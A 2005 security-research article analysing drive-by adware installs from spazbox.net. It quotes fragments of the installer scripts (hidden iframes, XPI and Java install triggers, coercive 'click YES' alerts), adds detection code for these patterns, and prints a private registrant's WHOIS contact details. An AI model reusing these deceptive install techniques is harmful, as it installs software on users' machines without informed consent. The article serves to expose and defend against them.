XBlock By Actiance - Home

Anatomy of a Drive-By Install - Even on Firefox

by Jan Hertsens, Wayne Porter

(Everything you wanted to know about drive-by installs but were afraid to ask.)

Introduction

For this analysis we visited the Spazbox.Net domain and ran a series of tests on what the user experiences there. We selected this domain because it exhibits stealth behavior when installing software. We wanted to dissect these installations through the eyes of a user running any of the three most popular browsers: Internet Explorer with Service Pack 2, Firefox, and Internet Explorer with Service Pack 1. We have elected not to test Netscape because SpywareWarrior.com has a complete write-up, with video. Note that they take a slightly different approach to their testing. Their write-up is worth reading and understanding, as it is directly related to this incident. It also covers separate issues with certain other vendors which we do not touch upon.

Warning: We discourage people without a highly technical background from visiting the domain in question. In other words, do not try this at home. All videos have been made by a professional technician on a closed-circuit course. :)

Preparation

Each installation and analysis was performed on a fresh machine. We deactivated any anti-virus or anti-spyware software on the machine. In addition, we deactivated the XBlock Enterprise perimeter defense product (our own proprietary product in beta testing) so that no programs would be stopped from installing or frozen from operating. We also removed our freeware ActiveX inoculation product. In the case of the Firefox installation we started with a virgin install of the Firefox browser.

What The User Sees

The behavior the user encounters differs greatly depending on the browser used:

Internet Explorer SP2

  • The user will see an elaborate movie explaining how to accept the installation without any reference to what is being installed, why it is being installed, or from where it is being installed. The only information they receive from the movie, aside from install instructions, is a large sign that says THEY MUST INSTALL it.
  • View Movie

Mozilla Firefox

  • The user will see a virgin installation of Firefox, a rather boring period where we are asked to install the Java Virtual Machine (which would not apply to the average user, who would already have it installed), and then a confusing Java prompt that asks the user to run an applet. At no point is a EULA or any representation of what is about to happen presented.
  • A few seconds later an Internet Explorer browser window opens up congratulating the user on a successful installation and the tray area shows a new icon bearing the 180solutions logo.
  • View Movie

Internet Explorer SP1

  • The user will see a blank page so no video capture is possible.
  • To show that activity is still happening behind the scenes despite the lack of any on-screen movement, we have attached the following packet analysis and the URLs extracted from it. Notably, the URL log shows over 150 connections happening behind the scenes!
  • View Extraction Log

Source Code Analysis

Main page

We are examining the source of the default homepage of spazbox.net. The page is devoid of any real content (technically it is not even correct HTML), and only contains this code:

<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a072a874/a577a9.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->

<!-- AUTO_PROMPT AD START -->
<script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=0&
loadfirst=1&delayload=0&account_id=152854&recurrence=always&adid=a1107890162&
event_type=onload'></script> <script language="JavaScript">self.focus();</script>
<!-- AUTO_PROMPT AD END -->

<!-- AUTO_PROMPT AD START -->
<script language="JavaScript" type="text/JavaScript" src="http://c4tdownload.com/js.php?event_type=onload&recurrence=always&retry=0&loadfirst=1&
account_id=ludicures&delayload=&nogeo=1&adid=d48120fd596713f97724cd146f82622b&cc=0&
axshow=0&idnum=372"></script> <!-- AUTO_PROMPT AD END -->

These are 3 different calls to external Javascript files. We shall examine each Javascript individually.
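
An added example (not code from the original article or from any vendor named in it): a Node.js function that inventories the external script includes in the markup quoted above and extracts the account_id and adid query parameters. Treating those two parameters as affiliate identifiers is an assumption based on their names; the function name and output shape are hypothetical.

```javascript
// PAGE is the spazbox.net markup quoted above, including its wrapped URLs.
const PAGE = `
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a072a874/a577a9.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=0&
loadfirst=1&delayload=0&account_id=152854&recurrence=always&adid=a1107890162&
event_type=onload'></script> <script language="JavaScript">self.focus();</script>
<script language="JavaScript" type="text/JavaScript" src="http://c4tdownload.com/js.php?event_type=onload&recurrence=always&retry=0&loadfirst=1&
account_id=ludicures&delayload=&nogeo=1&adid=d48120fd596713f97724cd146f82622b&cc=0&
axshow=0&idnum=372"></script>
`;

// Assumption: these parameter names carry the affiliate and ad identifiers.
const TRACKING_PARAMS = ['account_id', 'adid'];

// List every script loaded from a host other than the page's own.
function externalScripts(html, pageHost) {
  // [\s\S] lets the src value span line breaks, as it does in the quoted markup.
  const tagRe = /<script\b[^>]*\bsrc\s*=\s*(["'])([\s\S]*?)\1[^>]*>/gi;
  const found = [];
  for (const m of html.matchAll(tagRe)) {
    let url;
    try {
      url = new URL(m[2].replace(/\s+/g, ''), `http://${pageHost}/`);
    } catch {
      continue; // unparsable src: nothing to attribute
    }
    if (url.hostname === pageHost) continue; // first-party include
    const tracking = {};
    for (const p of TRACKING_PARAMS) {
      if (url.searchParams.has(p)) tracking[p] = url.searchParams.get(p);
    }
    found.push({ host: url.hostname, path: url.pathname, tracking });
  }
  return found;
}

console.log(externalScripts(PAGE, 'spazbox.net'));
```

Inline scripts (the self.focus() calls) have no src and are skipped, so the result contains exactly the three third-party includes.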

Javascript Number 1

URL: http://static.windupdates.com/prompts/a072a874/a577a9.js (Cached copy of the script)

This domain is owned by CDT Inc, which is now owned by 180solutions following its recent acquisition of CDT. One page on it has a special note on the EULA mentioning 180solutions and other partners.

Side Note on the Windupdates License Agreement: During IE SP1 installs and Java installs, users are never presented with a EULA or license agreement. However, in the case of an install on IE with SP2 (see video), users will see the agreement AFTER the installation of the software and not before.

Users should take special note of Section 15 of the EULA. Under this section of the agreement the user cannot participate in a class action suit, but must abide by the AAA. The user also agrees to pay for all direct or indirect costs arising out of the claim, including legal costs, transportation, accommodations, and telephone calls. In addition, the user must pay CDT (now owned by 180solutions) $300 per hour to attend the arbitration, including transport time. The cost of arbitration would clearly be far beyond the resources of the average citizen.

Quote from the CDT EULA

15. ARBITRATION. Any claim or controversy arising out of or related to this Agreement, or the products or services we provide and/or distribute shall be settled by binding arbitration in accordance with the rules of the American Arbitration Association. Any such claim or controversy shall be arbitrated on an individual basis and shall not be consolidated with a claim of any other party. You agree to pay any/all direct and/or indirect costs arising out or related to the claim and/or controversy, including but not limited to legal costs, transportation, accommodation, telephone calls. You also agree to pay CDT $300 per hour to attend arbitration including transport time. The foregoing shall not preclude CDT from seeking any injunctive relief for protection of CDT's intellectual property rights.

Analysis

  • The file is (by Javascript standards) quite large. It is bigger than all the other scripts combined.
  • The file is encoded/obfuscated in a fairly professional manner. If you open it up as-is, it looks more like "line noise" than code. It took several sophisticated tools and hours of poking at it to "break the ice". The results of this work can be seen in this (partially) decoded file. Due to time constraints, we have not been able to fully decode the entire contents, but enough is made visible to give a general idea of the script's operation and the details of some of its general tactics.
  • Support for ActiveX installs:
    http://static.windupdates.com/cab/CDT/ie/Bridge-c139.cab
  • Support for Java based installs:
    http://static.windupdates.com/cab/CDT/java/bridge.jar
  • Support for Netscape XPI based installs:
    http://static.windupdates.com/cab/CDT/xpi/install.xpi
  • (Yet unanalyzed) code that scans the URL for some curious parts:
    MusicUnlimited|DownloadsUnlimited|GamesUnlimited|AgeVerifier|DownloadAccess|AdultAccess|MusicAccess|MediaAccess|WebsiteAccess|CDT
  • Code to detect the presence of some known ActiveX adware components:
    ... "bridgex", "winadx", "SyncroAdX", "WinCommX",...
    try { if (new ActiveXObject(gActiveXNamesArray[gLoopIndex] + ".installer")) { return true; ....
  • Explicit detection and handling of Firefox browsers:
    if (navigator.name == "FireFox" || navigator.name == "Mozilla") {
  • Code for logging the installation and creating pop-unders
  • Claims that the user will get "something" for free:
    _x5N.innerHTML = 'Install the ActiveX to get the full version for free';
  • (Yet unanalyzed) code that appears to open Windows Media Player with a "protected" media file:
    <OBJECT ID='__wmp__' CLASSID='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6' width='" + lc_protect_wmp_file_width ...


Javascript Number 2

URL: http://install.xxxtoolbar.com/ist/scripts/prompt.php?... (Cached copy of the script)

Analysis

  • Seems to be an installer by XXXToolbar for SlotchBar, ISTBar
  • Creates an invisible iframe in which it will insert the code to install the ActiveX:
    document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
  • Repeated prompts for the user to install:
    alert("You must click YES to get access");
  • Automatic detection of the Service Pack of Internet Explorer machines:
    if(window.navigator.userAgent.indexOf("SV1") != -1) sp2=true;
  • Functionality for attempting a Java based install:
    <APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar"....
  • Functionality for Netscape (and related browsers) XPI based install:
    if (InstallTrigger.updateEnabled()) {
    InstallTrigger.install({'Content Access Plugin 1.01' : 'http://www.xxxtoolbar.com/ist/softwares/v4.0/ist_netscape.xpi'});

Javascript Number 3

URL: http://c4tdownload.com/js.php?... (Cached copy of the script)

Analysis

  • Appears to be an installer for Search Miracle
  • Creates an invisible iframe in which it will insert the code to install the ActiveX:
    document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
  • Repeated prompts for the user to install by claiming it will "Upgrade their Internet Explorer Browser":
    alert("\n\nWe STRONGLY recommend you upgrade your\n\nMicrosoft™ Internet Explorer Browser\n\n\n Click YES Now !\n\n");
    checkretry ;
    alert("\n\nClick YES to upgrade your\n\nMicrosoft™ Internet Explorer Now !\n\n");
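
An added example (not part of the original article): static triage rules, written for Node.js, that flag the installer-script behaviours listed in the three analyses above. The rule names, the display:none variant and the two sample strings are assumptions made for illustration; the samples are constructed from the fragments quoted on this page, with elided tags closed by hand.

```javascript
// One rule per behaviour described in the analyses above.
const RULES = [
  { id: 'hidden-iframe', why: 'iframe created invisible to the user',
    // visibility:hidden is the form quoted above; display:none is an added variant
    re: /<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none)/i },
  { id: 'activex-probe', why: 'probes for installed ActiveX components',
    re: /new\s+ActiveXObject\s*\(/ },
  { id: 'xpi-install', why: 'triggers an XPI install from script',
    re: /InstallTrigger\s*\.\s*install\s*\(/ },
  { id: 'java-applet', why: 'loads a remote JAR through an applet tag',
    re: /<applet\b[^>]*\barchive\s*=\s*["']?https?:/i },
  { id: 'sp2-sniff', why: 'branches on the IE SP2 "SV1" user-agent token',
    re: /userAgent\s*\.\s*indexOf\s*\(\s*["']SV1["']/ },
  { id: 'coercive-alert', why: 'alert() telling the user to click YES',
    re: /alert\s*\(\s*["'][^)]*click\s+yes/i },
];

// Constructed samples assembled from the quoted fragments of scripts 2 and 3.
const SCRIPT2 = String.raw`
document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
alert("You must click YES to get access");
if(window.navigator.userAgent.indexOf("SV1") != -1) sp2=true;
document.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar"></APPLET>');
if (InstallTrigger.updateEnabled()) {
  InstallTrigger.install({'Content Access Plugin 1.01' : 'http://www.xxxtoolbar.com/ist/softwares/v4.0/ist_netscape.xpi'});
}`;
const SCRIPT3 = String.raw`
document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
alert("\n\nWe STRONGLY recommend you upgrade your\n\nMicrosoft™ Internet Explorer Browser\n\n\n Click YES Now !\n\n");
alert("\n\nClick YES to upgrade your\n\nMicrosoft™ Internet Explorer Now !\n\n");`;

// Return every rule that fires, with a hit count; repeated prompts show up as count > 1.
function triage(source) {
  const hits = [];
  for (const rule of RULES) {
    const re = new RegExp(rule.re.source, rule.re.flags + 'g');
    const count = [...source.matchAll(re)].length;
    if (count > 0) hits.push({ id: rule.id, count, why: rule.why });
  }
  return hits;
}

console.log(triage(SCRIPT2), triage(SCRIPT3));
```

These rules only work on readable source; an obfuscated file such as script number 1 has to be decoded before they can match anything.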

Why select Spazbox.net for Analysis?

Initial analysis of this target shows some odd characteristics that call for investigation. First, the site is devoid of content, or appears to be. However, using Waybackmachine.org you can see several different screen shots starting from 2003, which give some insight into the owner. This also tells us there has been activity on this domain from a live person. We also note that another domain, Devoid.us, resides on the same machine. It displays similar characteristics and source code and appears to be owned by the same individual. Unfortunately there is no archived information on the Devoid.us site. Checking the address at maps.google.com, we could not confirm that it is even a valid mailing address.

Key Facts About SpazBox.net

Server Type: Apache/2.0.50 (FreeBSD)

Ownership Information: History shows a total of ten (10) changes to domain owner records.

Current information (Date: 04.12.05) reflects the current owner and contacts as follows:

Registrant:
John Wilson
16339 stubner arln #503
spring, Texas 77379
United States

Registered through: Blue Razor Domains, Inc.
Domain Name: SPAZBOX.NET
Created on: 19-Nov-03
Expires on: 19-Nov-06
Last Updated on: 27-Mar-05

Administrative/Technical Contact:
Wilson, John spazbox@gmail.com
16339 stubner arln #503
spring, Texas 77379
United States
2818934492

NetBlock Owner: United Colocation Group, Inc (Warning: Their list of hosted domains contains words unsuitable for minors)

Last Changed: According to NetCraft: 04.08.05

Trivia: "spaz" phonetically means "fun" in German.

Key Economic and Distribution Metrics

In this case it is important to look at key SEO metrics, as they give us some insight into the efficacy of the distribution strategy. Alexa data shows that significant traffic has flowed through this domain in the past, based on the graphs below.

MarketLeap is a free tool that allows users to gauge estimates of page saturation and link popularity by automating and aggregating queries across multiple search engines. In this case analysis shows Spazbox.net garnering no appreciable search engine saturation (number of pages found in a search engine) across any major search engine. This is strange, as most legitimate sites have at least their home page indexed, unless, of course, the site has been penalized by various search engines under their own rules.

More importantly, MarketLeap analysis shows no incoming links, with the exception of one link coming from MSN in the form of an Arabic message board.

Important Question:
While this domain appears isolated, with virtually no links in from any significant search engine and no page saturation in any search engine, this is paradoxical given the Alexa data, which shows transient yet significant traffic spikes throughout the year. In short, where are the visitors coming from if they are not coming from the Web? Could traffic be originating from IRC, SPIM, word of mouth, or another unknown source? There is the remote possibility that the domain owner could be using U.C.E. to attract visitors, but scanning known repositories of spam operations and USENET abuse reports shows no such activity, so this has been ruled out.

Obviously the only way to accurately verify traffic would be access to the machine's server logs, which are not made public.

Important Questions To Be Asked

  1. How can SpazBox.net enter into an affiliate agreement to become a multi-toolbar distributor using a domain with zero content to prove site intent or purpose? More specifically what were the vetting procedures used to select this site as a distribution partner?
  2. During the install shown in the SP2 video, is the labeling of the xxxtoolbar, CDT and SearchMiracle installations appropriate and accurate, and does it give enough information for the average user to understand what they are receiving?
  3. During the IE Service Pack1 install, the user receives no prompts, no EULA, or license agreement whatsoever. Does this behavior violate any deceptive advertising practices or laws? How can a user be bound by an agreement they are not presented?
  4. Why does CDT generate javascript code in an encrypted format designed to make analysis difficult and non-transparent?
  5. Since certain distributors claim to verify traffic and scrutinize their affiliate partners with great diligence it is important to note that while the affiliate site shows suspicious traffic patterns, the affiliate site is merely cutting and pasting in standard links from distribution partners. Is the affiliate breaking any of the distributor's TOS?
  6. Why do Service Pack 2 users (and only those) see an elaborate movie explaining to them how to accept the installation without any reference to what is being installed, why it is being installed, or from where it is being installed? The only information they receive from the movie, aside from install instructions, is a sign that says THEY MUST INSTALL it.
  7. Why are some browser users entitled to less information than other browser users? For example users with IE Service Pack 1 receive no information and only a blank page, while users with Service Pack 2 receive an instructional flash movie on how to install something.
  8. Since the affiliate receives compensation per download, why would companies enter into agreements where affiliates can put forth so many programs that a machine’s performance is seriously compromised, to the point where one of our test machines required extensive repair because Windows would no longer function properly? If the goal for adware makers is to make money, then why enter into agreements with affiliates that overload machines? This seems to fly in the face of standard performance marketing best practices.

Who to Blame for this Situation- The Facts

Before making any decisions, let us have a look at what (according to our analysis) each actor did:

SpazBox.net (The Affiliate)

  • Signed up for various affiliate programs. Source of sign-up or affiliate system undetermined and may be governed by different agreements.
  • Cut and pasted standard code from the affiliate program or broker into the empty web page
  • Posted Web Page online.
  • Directed traffic to the web page through methods unknown and indiscernible at this time.

"Software Makers" (The Distributors)

  • Either accepted the affiliate into their program or worked with a broker or sub-broker who accepted the affiliate agreement on that person's behalf
  • Provided linking code to this affiliate or, as the case may be, a deal broker. However, we tend to rule out the possibility of the broker arrangement, since the linking code appears to use the same static affiliate ID that points directly to the software program distributors' domains. This linking code is provided as an accurate means of calculating compensation.
  • The Software Makers host ALL content used in this scenario, including the code-signed CAB files, Java packages, and XPI files (for Netscape or Firefox users) and all the javascript seen in action during this scenario.
  • Through javascript analysis it can be concluded they implemented routines to install software on or through all major browser platforms.
  • Selected wording and graphics to be shown (or not shown) to the user upon, during and before installation.
  • In one case a Distributor, "Windupdates", obfuscated their javascript through encryption technology.
  • Distributors appear to log all installations of their various software programs including the referral URL and affiliate ID.
  • In general served lists of ads to display and keywords to match on to the installed software components.

XBlock's Conclusion

Based on the evidence gathered, Spazbox.net did not demonstrate any special technical skills or trickery on the index page of the domain, based on the code shown above. It appears the owner merely copied and pasted pre-made javascript code that was generated or given to him by the distributor. The only element in his behavior that is unclear is how traffic is being generated to this site in order to drive installations.

It is our opinion that the software distributors are responsible for any and all behavior that we have documented in the packet logs, screen captures and movies above. The SpazBox.net affiliate had no control over the behavior of the programs or the javascripts as they were executed unless the Distributor allowed him to make modifications, but again this puts the responsibility on the Distributor(s).

This article is copyright 2005 by XBlock.com.
It may not be reprinted or copied without the express written consent of the author.

© Copyright 2003-2011, Actiance, Inc. All rights reserved.